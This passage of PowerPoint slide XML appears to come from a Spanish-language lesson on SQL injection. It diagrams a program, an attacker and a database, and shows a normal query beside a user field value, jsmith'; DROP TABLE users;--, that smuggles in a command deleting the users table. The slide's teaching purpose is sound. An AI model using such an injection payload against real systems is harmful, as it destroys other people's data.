              <a:t>Las inyecciones SQL permiten a los atacantes insertar las consultas SQL que deseen en las bases de datos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CA5657-D34C-0862-5E92-204283258795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;512;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28ED159-1FF0-61E0-B59A-CC279B113B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408701" y="2241297"/>
            <a:ext cx="3657120" cy="26157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B0F0"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE user='jsmith'</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Google Shape;513;p30" descr="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{427A0B0F-A8CF-F126-733C-C07FA820B435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="52999"/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="194707" y="1762573"/>
            <a:ext cx="1371684" cy="1666427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;514;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{523F0C9C-40F2-ED87-C714-700151496CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907812" y="3330927"/>
            <a:ext cx="2421" cy="1493288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;515;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFBBF1BD-1C40-6128-C321-A7CC1780A6D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971096" y="3793019"/>
            <a:ext cx="5074800" cy="954067"/>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800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>: jsmith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E2F0D9"/>
                </a:highlight>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>'; DROP TABLE users;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;516;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB466391-C023-9D73-541F-4351B961A538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383227" y="1447138"/>
            <a:ext cx="1003026"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Programa</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;517;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D223964A-085F-EE55-17B4-917F7F8AF65E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4331118" y="1565535"/>
            <a:ext cx="1796763"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Base de datos SQL</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;518;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192AAB94-CA9E-63EE-DA63-AD70719B2DC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450647" y="2488456"/>
            <a:ext cx="3393169" cy="12701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="0"/>
                  <a:pt x="10800" y="5400"/>
                  <a:pt x="10800" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="16200"/>
                  <a:pt x="16200" y="21600"/>
                  <a:pt x="21600" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="55686"/>
              </a:srgbClr>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chemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Google Shape;519;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{309AB7BC-AB0F-D722-EB14-2A5ACC043F0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4843814" y="1995281"/>
            <a:ext cx="1135512" cy="1196948"/>
            <a:chOff x="-2" y="-1"/>
            <a:chExt cx="1135511" cy="1196947"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Google Shape;520;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFE1754A-E5AB-EFFB-409C-79D9B28A2946}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="1135509" cy="1196947"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="2561"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1147"/>
                    <a:pt x="4835" y="0"/>
                    <a:pt x="10800" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16765" y="0"/>
                    <a:pt x="21600" y="1147"/>
                    <a:pt x="21600" y="2561"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19039"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21600" y="20453"/>
                    <a:pt x="16765" y="21600"/>
                    <a:pt x="10800" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4835" y="21600"/>
                    <a:pt x="0" y="20453"/>
                    <a:pt x="0" y="19039"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="56862"/>
              </a:scheme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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Google Shape;521;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76788335-31F1-527C-6214-342E322FF2B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="1135510" cy="283877"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="40000"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;522;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879EBA13-ED76-5C3F-2DC1-BFBECAC8E3FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="-1"/>
              <a:ext cx="1135510" cy="1196947"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="2561"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21600" y="3976"/>
                    <a:pt x="16765" y="5123"/>
                    <a:pt x="10800" y="5123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4835" y="5123"/>
                    <a:pt x="0" y="3976"/>
                    <a:pt x="0" y="2561"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1147"/>
                    <a:pt x="4835" y="0"/>
                    <a:pt x="10800" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16765" y="0"/>
                    <a:pt x="21600" y="1147"/>
                    <a:pt x="21600" y="2561"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19039"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21600" y="20453"/>
                    <a:pt x="16765" y="21600"/>
                    <a:pt x="10800" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4835" y="21600"/>
                    <a:pt x="0" y="20453"/>
                    <a:pt x="0" y="19039"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="2561"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="32538F">
                  <a:alpha val="26666"/>
                </a:srgbClr>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Google Shape;523;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{597DD397-6B0B-7BEB-F8B0-D82A0E77022C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="1450647" y="2814036"/>
            <a:ext cx="3393169" cy="21047"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="0"/>
                  <a:pt x="10800" y="5401"/>
                  <a:pt x="10800" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="16201"/>
                  <a:pt x="16200" y="21600"/>
                  <a:pt x="21600" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000"/>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chemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Google Shape;524;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{830E3966-F2E0-F993-1AFF-6E85EEB41DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2477741" y="2593754"/>
            <a:ext cx="1445479" cy="26157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0000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>DROP TABLE users</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Google Shape;525;p30" descr="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624ED66B-228D-17D1-5F8A-FBAAFC1A9CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="82196" t="2810" r="2086" b="69375"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5155164" y="2292395"/>
            <a:ext cx="516152" cy="645438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Google Shape;526;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1EFC80E-D0DB-359F-E28A-D393A79F7E1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5120148" y="2867426"/>
            <a:ext cx="592595"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Google Shape;527;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C33399E-78F6-1A1F-EDC1-491A65BA48CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5217293" y="2509404"/>
            <a:ext cx="356994" cy="325680"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="356993" cy="325679"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Google Shape;528;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EDB82B2-D8A4-E0AC-EA9B-357B6FD025D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="356991" cy="325679"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Google Shape;529;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CD1C6AA-B2F9-9B43-75D2-DD36CE2F7ABB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="-1" y="-1"/>
              <a:ext cx="356993" cy="325678"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Google Shape;531;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED314FE2-2595-9331-5359-DBABF723B03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="410481" y="4269237"/>
            <a:ext cx="994445" cy="1279453"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="994444" cy="1279452"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="Google Shape;532;p30" descr="Graphic 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8511A76-A775-B9EB-B802-59A9A0438DA6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Google Shape;533;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4EF5CED-FCD1-0544-FFE6-0371CF4F848B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="35344" y="910152"/>
              <a:ext cx="959100" cy="36930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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Atacante</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1554651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8021-F5A3-7A4B-A1E4-91669ECE384E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125537" y="-5571"/>
            <a:ext cx="10515600" cy="1325562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
